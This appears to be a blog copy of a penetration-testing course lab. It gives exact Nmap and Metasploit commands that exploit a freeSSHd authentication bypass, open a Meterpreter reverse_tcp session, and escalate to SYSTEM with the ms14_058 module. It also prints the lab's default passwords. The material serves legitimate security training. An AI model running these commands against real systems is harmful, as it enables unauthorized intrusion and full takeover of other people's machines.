Powered by Blogger.
Home » » Module 05: Network Penetration Testing Methodology-External /EX 3

Module 05: Network Penetration Testing Methodology-External /EX 3

Written By AKADEMY on Wednesday, July 3, 2019 | 11:08 AM

Exercise 3: Pentesting freeSSHd Vulnerability and Gaining Privileged Access to a Machine

Scenario

Organizations use ssh or a similar service to facilitate their intra/inter-company communications. To communicate in a secure manner, organizations implement FTP/SSH to encrypt the data flowing through their communication channels. This mitigates the risk of unauthorized interception or misuse of data. Despite such security measures, hackers, with the help of various tools, are able to exploit certain vulnerabilities in these encryption algorithms. These hacks can allow hackers to have partial or complete control of the computers on the network.
You are the security administrator of your organization. Your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, and data and identity thefts.
A Trojan is a program, which contains malicious code disguised as harmless code or data. When executed, it can take control of the host and cause damage such as ruining the file allocation table on the hard drive. The objectives of the lab include:
  • Pentesting the vulnerabilities in freeSSHd and establish a meterpreter session
  • Pentest Windows OS vulnerability and gain Privileged Access
Lab Duration25 Minutes
  1. Click Windows Server 2012 (External Network), click Ctrl+Alt+Delete.
    Screenshot
  2. In the password field click Pa$$w0rd and press Enter.
    You can use the Type Password option from the Commands menu to enter the password.
    Screenshot
  3. To install Nmap navigate to E:\ECSAv10 Module 05 Network Penetration Testing Methodology-External\Nmap, and double-click nmap-7.60-setup.exe. If an Open File - Security Warningpop-up appears, click Run and follow the steps to install Nmap (Zenmap) scanner.
    Screenshot
  4. To launch Nmap, double-click Nmap - ZenmapGUI icon on the desktop.
    Screenshot
  5. Zenmap (Nmap) main window appears as shown in the screenshot.
    Screenshot
  6. In this lab, we will perform an Intense scan on ports 1-100 of Accounts Department Subnet Cmachine.
    To perform the Scan, type nmap -p 1-100 -T4 -A -v 172.19.19.2 in the Command field and click Scan.
    In this lab, we are scanning IP address of the target machine located in the external network, whereas, in real-time, you will be scanning domains, for eg.: www.[targetwebsite].com with port number 22.
    Screenshot
  7. Nmap scans the provided IP address with Intense scan and displays the scan result in the Nmap Output tab as shown in the screenshot below.
    Screenshot
  8. In the Nmap Output tab, we observe that the port 45 is open, and the service running is SSH.
    The version of the SSH service is WebOnlyDo sshd 2.1.3 (protocol 2.0).
    We shall look now for the suitable exploits related to this version of SSH in Kali Linux Metasploit Framework.
    Screenshot
  9. Click Kali Linux (External Network). If Kali Linux lock screen appears, click on the screen and press Enter. If it does not appear, skip to the next task.
    Screenshot
  10. Type root in the Username field and click Next.
    Screenshot
  11. Type toor in the Password field and click Unlock.
    Screenshot
  12. Launch a command line terminal, type msfconsole and press Enter to launch msfconsole.
    Screenshot
  13. Since we found the SSH version as WebOnlyDo sshd 2.1.3, we shall search for this version in the msfconsole to find out if any exploits are available.
    Type search WebOnlyDo sshd 2.1.3 in the msfconsole and press Enter.
    Screenshot
  14. Metasploit returns suitable exploits for the specified version, as shown in the screenshot below.
    We will use freesshd_authbypass exploit in this lab, to compromise the FreeSSHd vulnerability.
    Screenshot
  15. Type use exploit/windows/ssh/freesshd_authbypass and press Enter to use the exploit.
    Screenshot
  16. We need to set the options associated with the exploit.
    Type show options and press Enter to view the options associated with the exploit.
    Screenshot
  17. Here, we will set the values of RHOST and RPORT. Our target machine (RHOST) in this lab is Accounts Department Subnet C with the IP Address 172.19.19.2, and FreeSSHd is running on port 45.
    So, enter the following commands in msfconsole:
    i. set rhost 172.19.19.2
    ii. set rport 45
    Screenshot
  18. Since we set the options, we will now exploit the machine.
    Type exploit and press Enter.
    The exploit begins to perform dictionary attack using its wordlist on the FreeSSHd server.
    Screenshot
  19. Upon finding the username, it starts injecting the shellcode into the remote machine and launches a meterpreter session as shown in the screenshot below.
    Screenshot
  20. Now, type getuid and press Enter to view the user that the Meterpreter server is running as, on the target machine.
    The command returns that the Meterpreter session is running as a regular user account (Admin01), which means you will not be able to perform privileged user actions on the session.
    Screenshot
  21. Type sysinfo and press Enter to view the information related to the operating system and its architecture.
    Screenshot
  22. Now, based on the operating system information, we shall use a suitable exploit that can help us attain privileged access to the machine.
    In this lab, we will use ms14_058_track_popup_menu exploit module.
  23. Now, we need to background the meterpreter session in order to apply the ms14_058_track_popup_menu module.
    So, type background and press Enter.
    Screenshot
  24. Type use exploit/windows/local/ms14_058_track_popup_menuand press Enter to use the exploit module.
    Screenshot
  25. Now, we need to set the session value in this module and configure the payload.
    So, issue the following commands:
    i. set session 1
    ii. set payload windows/meterpreter/reverse_tcp
    iii. set lhost 172.19.19.7
    Screenshot
  26. Type exploit and press Enter to perform privilege escalation.
    Screenshot
  27. Once you hit Enter, the module exploits the vulnerability in operating system and presents a meterpreter shell with escalated privileges as shown in the screenshot.
    Screenshot
  28. Now, type getuid and press Enter to view the user that the Meterpreter server is running as, on the target machine.
    The command returns that the Meterpreter session is running as a privileged user account (NT AUTHORITY.SYSTEM), which means privileged user actions can be performed on the session.
    Screenshot
  29. Thus, you have exploited the vulnerabilities in Windows application and Windows OS to gain privileged access to the machine.
In this lab, you have learned how to:
i. Pentest the vulnerabilities in freeSSHd and establish a meterpreter session
ii. Pentest Windows OS vulnerability and gain Privileged Access
Share this article :

0 comments:

Post a Comment

 
Trung Tâm Đào Tạo An Toàn Thông Tin Học Hacker Mũ Xám Online | Học An Ninh Mạng Trực Tuyến | CEH VIỆT NAM
Copyright © 2013. HACKER MŨ XÁM - All Rights Reserved
Web Master @ Võ Sĩ Máy Tính
Contact @ Đông Dương ICT